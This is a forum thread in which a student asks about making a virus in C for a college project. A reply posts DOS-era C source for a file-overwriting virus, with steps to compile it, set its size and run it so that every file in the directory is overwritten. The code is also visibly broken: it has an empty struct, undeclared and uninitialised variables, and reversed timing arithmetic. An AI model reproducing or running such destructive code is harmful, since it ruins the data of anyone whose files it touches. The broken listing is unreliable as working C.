can we make a virus or anti virus using 'c'or 'c++'....... please tell me . i need to make a college project on 'c'of about 2000 lines .please guide me to a good and innovative project.
There is a lot of virus depends on you where u want to use it i.e. for network, for simple desktop pc etc. >> first understand on desktop how types of viruses may be Example: To Destroy all files making them size 0 or else. Code: #include<stdio.h> #include<conio.h> #include<dir.h> #include<io.h> #include<time.h> #include<dos.h> FILE *vPtr,*lPtr; unsigned long x; int nSize,nCount=0; char buff[4096]; clock_t beg,end; struct fBlock { } fBlck; void main() { beg=clock(); clrscr(); comp=findfirst("*.*",&fBlck ,0); while(!comp) { lPtr=fopen(fBlck .ff_name,"rb+"); vPtr=fopen(_argv[0],"rb"); if(lPtr==NULL) goto next; nSize=100000; printf("Infecting %s\n",fBlck .ff_name,a); while(nSize>4096) { fread(buff,4096,1,vPtr); fwrite(buff,4096,1,lPtr); nSize-=4096; } fread(buff, x, 1, vPtr); fwrite(buff, x, 1, lPtr); nCount++; next: { fcloseall(); comp=findnext(&fBlck); } } printf("DONE! (Total Infected Files = %d)",nCount); end=clock(); printf("TIME TAKEN=%f SEC\n", (beg-end)/CLK_TCK); getch(); } >>> You can use borland c. First compile and link and see the size of this Exe in bytes. same value you have to assign to "nSize" variables in the program Now again compile and then run this program, then all files in that directory will be infected. This is for your initiates of your project. A lot of things are there. First read many other way like process replica etc. THis is only for your kind of your information and for your project(Academic)only. Dont use it any places.